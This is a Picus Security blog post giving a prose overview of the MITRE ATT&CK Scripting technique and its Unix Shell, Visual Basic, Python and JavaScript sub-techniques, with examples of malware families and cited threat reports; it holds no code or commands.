Picus Security
Published in

Picus Security

Hackers’ Favourite Scripting Languages Part 1: MITRE ATT&CK T1064 Scripting Technique

by Süleyman Özarslan, PhD

In 2019, Picus Labs analyzed 48813 malware to determine tactics, techniques, and procedures (TTPs) used by adversaries in these malicious files. Picus Labs categorized each observed TTP by utilizing the MITRE ATT&CK® framework. As a result of the present research, 445018 TTPs observed in the last year were mapped to ATT&CK to identify the top 10 most common techniques used by attackers. has found that Scripting was the sixth most prevalent ATT&CK technique used by adversaries in their malware.

A script is a set of codes written in a scripting language such as AppleScript, PowerShell, Python, Unix Shells (bash, sh and others), VBScript, and JavaScript/JScript. Legitimate users like system administrators and programmers use scripting to accelerate operational tasks by automating them in scripts. Adversaries also use scripts to automate multiple actions. Our research has found that Scripting was the sixth most prevalent ATT&CK technique used by adversaries in their malware.

Introduction

A script is an ordered set of commands written in a scripting language. A scripting language is an interpreted programming language that executes scripts without compiling. Not only legitimate users but also adversaries use Scripting to automate long tasks and execute codes that include multiple actions. Some scripting languages like PowerShell and VBScript in Windows systems and Unix shells in Unix based systems and AppleScript in macOS can interact directly with the operating system at an API, so they can be used by adversaries to bypass weak process monitoring mechanisms.

In this article, we review:

  • the fundamentals of the Scripting technique
  • updates on the technique in the new version of the ATT&CK framework
  • sub-techniques derived from the Scripting technique
  • its use cases by threat actors and malware
  • red and blue team exercises for this technique

If you’d like to learn more about MITRE ATT&CK, check out our LinkedIn group with all the latest! https://www.linkedin.com/groups/8955879/

Changes in the New Version of the MITRE ATT&CK Framework

The July 2020 (v7) ATT&CK release is the first non-beta release of Enterprise ATT&CK represented with sub-techniques [1]. MITRE ATT&CK Sub-techniques are a way to describe a specific implementation of a technique in more detail.

In the new sub-technique version of the MITRE ATT&CK Framework, the T1064 Scripting technique is deprecated. However, it was not completely removed in the new version. The Scripting technique is split into separate T1059.004 Unix Shell, T1059.005 Visual Basic, T1059.006 Python, and T1059.007 JavaScript/Jscript sub-techniques of T1059 Command and Scripting Interpreter.

Command and Scripting Interpreter Sub-techniques

The first three sub-techniques of the Command and Scripting Interpreter technique, T1059.001 PowerShell, T1059.002 AppleScript, and T1059.003 Windows Command Shell, were explained in our Command-Line Interface blog post. Command Line Interface was the sixth most prevalent ATT&CK technique according to our 10 Critical ATT&CK Technique research. Although these three techniques are also scripting languages, they were not included in the Scripting technique of the previous ATT&CK version, since they were stand-alone techniques.

In this blog post, we describe four other sub-techniques that are derived from the Scripting technique.

1. T1059.004 Unix Shell

Unix shell is the primary command-line interpreter that provides a command-line interface (CLI) for Unix based operating systems (OS) such as macOS, Linux, and BSD. The Bourne Shell (sh), Bourne-Again Shell (bash), Z Shell (zsh), Korn Shell (ksh), and Secure Shell (SSH) are the most commonly used Unix shells.

In addition to an interactive CLI, The Unix shell also provides a scripting language to control the execution of the OS using shell scripts. Basically, a shell script is a set of commands that are in the execution order. The Unix shell can control any part of the system and support typical programming concepts such as conditional tests, loops, file operations, variables, and functions.

Since Unix shells are powerful and flexible tools that execute commands and control the system, adversaries use Unix shells to execute various commands and malicious payloads. Moreover, they control remote systems with SSH during the lateral movement and command and control phases. Some use cases of Unix shells in malware:

  • to execute multiple commands on victims:
  • macOS Bundlore adware [2], Derusbi malware [3], Linux/Exaramel backdoor [4]
  • to create a reverse shell:
  • CallMe OSX Trojan [5], Chaos backdoor [6], Cointicker macOS cryptocurrency ticker [7]
  • to start/stop OS services and installed applications:
  • LoudMiner cross-platform cryptocurrency miner [8], WindTail OSX backdoor [9]
  • download additional payloads:
  • Shlayer macOS malware [9], [10], Skidmap cryptocurrency miner [11]

2. T1059.005 Visual Basic

  • Visual Basic for Applications (VBA): VBA is an implementation of the Visual Basic language that provides process automation, Windows API access, and other low-level functionality through DLLs. Including Office for macOS, it is included in most Microsoft Office applications. As a common malicious usage scenario, adversaries embed their malicious codes in VBA macros in Microsoft Office files, then sends these malicious files as email attachments to victims (MITRE ATT&CK T166.001 Spearphishing Attachment)
  • VBScript (Microsoft Visual Basic Scripting Edition):VBScript is a derivative of Visual Basic that enables the user to control many aspects of the system by using COM. Although VBScript initially targeted web developers by providing web client scripting in Internet Explorer and web server scripting in IIS, it gained support from Windows system administrators and adversaries because of its extensive functionality. For example, in a malware campaign revealed in March 2020, an obfuscated VBScript package was used to drop various malware such as Zloader, Ursnif, Qakbot, and Dridex [16]. The initial access vector is an email that contains a zipped VBScript file (.vbs) that appeared to be an invoice.

3. T1059.006 Python

Python is a popular high-level interpreted programming language. Since Python interpreters are available for the most of the operating systems and it has a comprehensive standard library that can perform many functions, adversaries use Python to execute commands, download payloads and perform various malicious behaviors. Threat actors create not only malware but also vulnerability exploit tools with Python.

Python can be executed in multiple ways:

  • interactively from the command-line interface (CLI)
  • via Python scripts (.py)
  • via binary executables created by compilation of Python code

One of the most recent Python-based malware is the PoetRAT remote access trojan (RAT) [17]. Briefly, it uses a Word document that contains a VBA script to drop a ZIP file. Then, the VBA macro unzips the zip file and executes the PoetRAT, which is a Python script. The zip file also contains a Python interpreter because Windows has no default Python interpreter.

4. T1059.006 JavaScript/JScript

JavaScript (JS) is a high-level ad multi-paradigm programming language that supports event-driven, functional, and imperative programming styles. JavaScript conforms to the ECMAScript specification, which is a standard for the interoperability of Web pages across different browsers. In fact, ECMAScript is the official name of the JavaScript language [18]. Jscript is Microsoft's implementation of the ECMAScript language specification [19]. It is an interpreted scripting language as most of the scripting languages.

In most cases, adversaries use JScript to develop droppers/downloaders to install/download the actual malware [20], [21]. They use heavy obfuscation methods on .js files that can evade static AV signatures [20], [21]. In some cases, adversaries use VBA and JScript together in their malware like TrickBot [22].

References

[1] “Updates — July 2020.” [Online]. Available: https://attack.mitre.org/resources/updates/updates-july-2020/. [Accessed: 10-Aug-2020]

[2] O. Sushko, “macOS Bundlore: Mac Virus Bypassing macOS Security Features,” 17-Apr-2019. [Online]. Available: https://mackeeper.com/blog/post/610-macos-bundlore-adware-analysis. [Accessed: 11-Aug-2020]

[3] “Website.” [Online]. Available: https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2016/2016.02.29.Turbo_Campaign_Derusbi/TA_Fidelis_Turbo_1602_0.pdf. [Accessed: 11-Aug-2020]

[4] “New TeleBots backdoor: First evidence linking Industroyer to NotPetya,” 11-Oct-2018. [Online]. Available: https://www.welivesecurity.com/2018/10/11/new-telebots-backdoor-linking-industroyer-notpetya/. [Accessed: 11-Aug-2020]

[5] R. Falcone and J. Miller-Osborn, “Scarlet Mimic: Years-Long Espionage Campaign Targets Minority Activists,” 24-Jan-2016. [Online]. Available: https://unit42.paloaltonetworks.com/scarlet-mimic-years-long-espionage-targets-minority-activists/. [Accessed: 11-Aug-2020]

[6] S. Feldmann, “Chaos: a Stolen Backdoor Rising Again,” 14-Feb-2018. [Online]. Available: https://www.gosecure.net/blog/2018/02/14/chaos-a-stolen-backdoor-rising/. [Accessed: 11-Aug-2020]

[7] T. Reed, “Mac cryptocurrency ticker app installs backdoors,” 29-Oct-2018. [Online]. Available: https://blog.malwarebytes.com/threat-analysis/2018/10/mac-cryptocurrency-ticker-app-installs-backdoors/. [Accessed: 11-Aug-2020]

[8] “LoudMiner: Cross‑platform mining in cracked VST software,” 20-Jun-2019. [Online]. Available: https://www.welivesecurity.com/2019/06/20/loudminer-mining-cracked-vst-software/. [Accessed: 11-Aug-2020]

[9] “Middle East Cyber-Espionage.” [Online]. Available: https://objective-see.com/blog/blog_0x3B.html. [Accessed: 11-Aug-2020]

[10] “TAU Threat Intelligence Notification: New macOS Malware Variant of Shlayer (OSX) Discovered,” 12-Feb-2019. [Online]. Available: https://www.carbonblack.com/blog/tau-threat-intelligence-notification-new-macos-malware-variant-of-shlayer-osx-discovered/. [Accessed: 11-Aug-2020]

[11] T. Micro, “Skidmap Linux Malware Uses Rootkit Capabilities to Hide Cryptocurrency-Mining Payload,” 16-Sep-2019. [Online]. Available: https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/. [Accessed: 11-Aug-2020]

[12] mcleanbyron, “The Component Object Model.” [Online]. Available: https://docs.microsoft.com/en-us/windows/win32/com/the-component-object-model. [Accessed: 11-Aug-2020]

[13] “The Windows Native API — TechNet Articles — United States (English) — TechNet Wiki.” [Online]. Available: https://social.technet.microsoft.com/wiki/contents/articles/11831.the-windows-native-api.aspx. [Accessed: 11-Aug-2020]

[14] “Inter-Process Communication: Component Object Model.” [Online]. Available: https://attack.mitre.org/techniques/T1559/001/. [Accessed: 11-Aug-2020]

[15] “Native API.” [Online]. Available: https://attack.mitre.org/techniques/T1106/. [Accessed: 11-Aug-2020]

[16] blubracket, “Obfuscated VBScript Drops Zloader, Ursnif, Qakbot, Dridex — Security Boulevard,” 24-Jun-2020. [Online]. Available: https://securityboulevard.com/2020/06/obfuscated-vbscript-drops-zloader-ursnif-qakbot-dridex/. [Accessed: 11-Aug-2020]

[17] W. Mercer, “PoetRAT: Python RAT uses COVID-19 lures to target Azerbaijan public and private sectors.” [Online]. Available: http://blog.talosintelligence.com/2020/04/poetrat-covid-19-lures.html. [Accessed: 12-Aug-2020]

[18] “JavaScript Versions.” [Online]. Available: https://www.w3schools.com/js/js_versions.asp. [Accessed: 12-Aug-202 0]

[19] “JScript (ECMAScript3).” [Online]. Available: https://docs.microsoft.com/en-us/previous-versions/hbxc2t98(v=vs.85). [Accessed: 12-Aug-2020]

[20] “Undetected JScript Dropper Installs Sage Ransomware,” 20-Apr-2017. [Online]. Available: https://www.vmray.com/cyber-security-blog/undetected-jscript-dropper-executes-sage-ransomware/. [Accessed: 12-Aug-2020]

[21] “[No title].” [Online]. Available: https://file.gdatasoftware.com/web/en/documents/whitepaper/G_DATA_Analysis_Script.Trojan-Downloader.Fodevepdf.A.pdf. [Accessed: 12-Aug-2020]

[22] “Deobfuscating Ostap: TrickBot’s 34,000 Line JavaScript Downloader,” 03-Sep-2019. [Online]. Available: https://threatresearch.ext.hp.com/deobfuscating-ostap-trickbots-javascript-downloader/. [Accessed: 12-Aug-2020]

Originally published at https://www.picussecurity.com.

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Picus Security Inc.

Picus Security Inc.

Breach and Attack Simulation (BAS) | Continuous Security Validation | Gartner Cool Vendor